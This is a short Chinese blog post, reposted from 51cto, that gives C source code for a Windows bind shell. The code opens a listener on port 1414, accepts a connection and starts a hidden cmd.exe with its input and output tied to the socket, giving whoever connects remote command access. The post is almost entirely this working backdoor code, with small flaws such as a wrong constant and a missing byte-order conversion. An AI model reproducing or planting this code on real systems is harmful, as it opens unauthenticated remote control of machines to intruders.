原理很简单就是创建一个进程打开一个终端然后标准输入输出句柄重定位到一个网络端口
c版 win系统
#include<winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
int _tmain(int argc, TCHAR* argv[])
{
//1.初始化一个sock服务
WSADATA stWSA;
WSAStartup(0x0202, &stWSA);
SOCKET stListen = INVALID_ATOM;
//2.创建一个原始套接字
stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
SOCKADDR_IN stService;
stService.sin_addr.s_addr = INADDR_ANY;
//3.在任意地址上绑定一个端口
stService.sin_port = 1414;
stService.sin_family = AF_INET;
bind(stListen, (LPSOCKADDR)&stService, sizeof(stService));
//4.监听连接
listen(stListen, SOMAXCONN);
//5.接受一个连接
stListen = accept(stListen, 0, 0);
//6.创建一个cmd进程 并将其输入与输出重定位到我们创建的套节字上
PROCESS_INFORMATION stPI = { 0 };
STARTUPINFOA stSI = { 0 };
stSI.cb = sizeof(stSI);
stSI.wShowWindow = SW_HIDE;
stSI.dwFlags = STARTF_USESTDHANDLES;
stSI.hStdInput = (HANDLE)stListen;
stSI.hStdError = (HANDLE)stListen;
stSI.hStdOutput = (HANDLE)stListen;
CreateProcessA(0, "cmd.exe", 0, 0, TRUE, 0, 0, 0, &stSI, &stPI);
//7.关闭相关句柄并释放相关资源
CloseHandle(stPI.hProcess);
CloseHandle(stPI.hThread);
closesocket(stListen);
WSACleanup();
return 0;
}
转载于:https://blog.51cto.com/haidragon/2125220